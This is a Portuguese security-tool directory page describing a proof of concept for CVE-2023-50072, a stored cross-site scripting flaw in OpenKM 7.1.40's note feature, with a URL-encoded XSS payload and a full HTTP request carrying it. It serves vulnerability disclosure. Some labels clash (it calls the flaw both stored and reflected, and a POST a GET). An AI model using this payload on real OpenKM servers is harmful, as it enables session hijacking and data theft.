Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-50072 — Existe uma vulnerabilidade de cross-site scripting armazenado (XSS) no OpenKM versão 7.1.40. | Kitploit
Ferramentas/GitHubGitHub/ahrixia/cve-2023-50072
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubahrixia/cve-2023-50072

CVE-2023-50072

Existe uma vulnerabilidade de cross-site scripting armazenado (XSS) no OpenKM versão 7.1.40.

Ver Repositório
42há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-50072

Existe uma vulnerabilidade de cross-site scripting (XSS) armazenado no OpenKM versão 7.1.40 (dbb6e88) com Extensão Profissional que permite que um usuário autenticado faça upload de uma nota em um arquivo que atua como um payload XSS armazenado. Qualquer usuário que abrir a nota de um arquivo de documento acionará o XSS.

Parâmetro vulnerável: text

Exploit - Prova de Conceito (POC)

Cross-site scripting (XSS) refletido

root@kitploit:~
Payload :  
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>

Requisição GET em [http://localhost/openkm/rest/note/nodes/NODE-ID] :

root@kitploit:~
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

text=<image/src/onerror%3dalert(1)>

Impacto

O XSS armazenado permite que atacantes injetem scripts maliciosos em uma aplicação web, que são armazenados e executados quando outros usuários visualizam a página afetada. Isso pode levar ao roubo de informações sensíveis, sequestro de sessão ou distribuição de malware.

Captura de tela

openkm

Outros Payloads Funcionais

root@kitploit:~
Payload : 
FINAL Payload (URL encoded) : 
Baixar ferramenta